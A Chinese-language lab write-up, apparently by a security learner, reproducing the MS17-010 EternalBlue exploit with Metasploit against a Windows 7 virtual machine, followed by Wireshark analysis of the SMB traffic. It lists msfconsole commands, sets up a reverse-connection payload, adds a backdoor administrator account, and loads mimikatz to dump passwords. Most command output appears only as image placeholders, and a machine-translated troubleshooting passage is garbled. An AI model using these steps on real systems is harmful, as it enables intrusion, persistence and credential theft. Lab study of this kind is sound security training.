安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码

安全小白 整理分享学习过程 欢迎指点 呜呜呜卑微仔、、、

一、实验环境:
1、攻击机:KaliIP:192.168.218.157
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


1)攻击工具:msf
2)分析工具:wireshark
2、靶机:Windows7(旗舰版)IP:192.168.218.160
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


1)开启网络共享(SMB协议)
2)关闭防火墙
3、网卡连接方式:Vmnet8(NAT)
二、实验步骤:
1、测试攻击机与靶机的连通性
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


2.进行MS17-010漏洞扫描
1)启动msf
命令:msfconsole
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


2)搜索ms17_010
命令:search ms17_010
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


3)smb_ms17_010模块进行MS17-010漏洞扫描
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片

4)设置攻击载荷
payload模块进行反弹连接
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片

5)查看需要设置的模块(带yes的)
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


6)设定监听主机 set lhost 192.168.218.157(kali)
设置扫描的主机(网段)以及端口号SMB协议默认445端口
命令:set rhosts 192.168.218.160/24
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


7)执行exploit(run)命令进行扫描发现目标主机漏洞
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


可以看到监听IP及端口,攻击机与靶机之间成功建立会话
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


出现meterpreter>攻击成功!渗透后信息收集、持续攻击

  1. 远程显示主机系统信息
Meterpreter>sysinfo
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


2)查看用户身份
Meterpreter>getuid
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片

3)获得shell控制并新建一个用户
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


4)将此用户加入本地管理员组(后门植入,获取更大的权限)
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片

安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


  • wireshark数据抓包 分析攻击过程
选择vmnet 8网卡
【安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码】安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片



  1. 首先攻击机(Kali Linux)向靶机(Windows 7)发送一个SMB的Negotiate Protocol Request(协商协议请求)数据报,并列出攻击机所支持的SMB协议版本。
  2. 服务器响应一个SMB的Negotiate Protocol Response (协商协议响应)数据报; (如果无可使用的协议版本则返回0XFFFFH,结束通信。)
  3. 攻击机(Kali Linux)向靶机(Windows 7)发起一个Session setup X request(会话设置请求)数据报.
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


  1. 靶机(Windows 7)确认身份后发送一个Session Setup X Response(会话设置响应)数据报同意本次连接.
  2. 靶机(Windows 7)确认身份后发送一个Session Setup X Response(会话设置响应)数据报同意本次连接。
  3. 协商和认证成功之后,攻击机向靶机发送一个Tree Connect AndX Request(树连接和请求)数据报,列出要访问的网络资源的名称(匿名管道共享)
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片



  1. 服务器会发送一个Tree Connect AndX Response(树连接和响应)数据报,同意访问资源,并列出访问者的权限
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


  1. 连接到相应资源后,进行正常的网络共享访问

攻击过程重要数据特征
1.NT空载指令
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


2.TRANS 2 攻击负载 拆分
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


3.Response =>MultiplexID:64(攻击成功)
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片

安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片


过程中所遇到的问题:
Exploit completed, but no session was created.(攻击成功但会话未连接)
如果出现以下情况之一,则“无会话已创建”消息
发生:
1)使用的漏洞利用对所选择的目标不起作用。可以
是一个不同版本的漏洞,有一个问题
利用代码,或目标配置有问题。(经检查验证是此问题)

2)使用的漏洞利用被配置为使用不创建的有效载荷
互动会话。在这种情况下,框架无法知道
被剥削者是否工作,因为它没有收到连接
从目标成功时(例如运行记事本)。
如果尝试反向有效载荷,获取该消息和目标服务
不会崩溃,确保您的目标设置是正确的,而且
目标系统正在运行正确版本的易受攻击的软件。
meterpreter中使用mimikatz抓取密码 参考链接:
https://blog.csdn.net/qq_36374896/article/details/107005461?utm_source=app&app_version=4.8.1
  1. 进去meterpreter后getuid一下-----获得系统管理员权限安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
    文章图片

2. 加载mimikatz模块----load mimikatz
安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片

安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
文章图片



    推荐阅读